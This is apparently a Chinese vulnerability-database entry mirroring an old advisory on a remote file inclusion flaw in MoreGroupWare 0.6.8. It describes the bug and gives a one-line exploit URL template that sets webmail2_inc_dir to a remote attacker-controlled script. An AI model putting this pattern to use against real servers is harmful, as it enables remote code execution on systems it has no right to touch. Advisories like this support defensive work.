MoreGroupWare 0.6.8 – WEBMAIL2_INC_DIR Remote File Inclusion

MoreGroupWare 0.6.8 – WEBMAIL2_INC_DIR Remote File Inclusion

漏洞ID 1054041 漏洞类型
发布时间 2003-07-21 更新时间 2003-07-21
图片[1]-MoreGroupWare 0.6.8 – WEBMAIL2_INC_DIR Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-MoreGroupWare 0.6.8 – WEBMAIL2_INC_DIR Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22948
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8249/info

moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a moregroupware URI variable. This variable is used in the include path for several moregroupware configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.

http://www.example.com/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]

相关推荐: Sun Solaris Lofiadm Kernel Memory Leak Denial Of Service Vulnerability

Sun Solaris Lofiadm Kernel Memory Leak Denial Of Service Vulnerability 漏洞ID 1100326 漏洞类型 Unknown 发布时间 2003-04-28 更新时间 2003-04-28 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享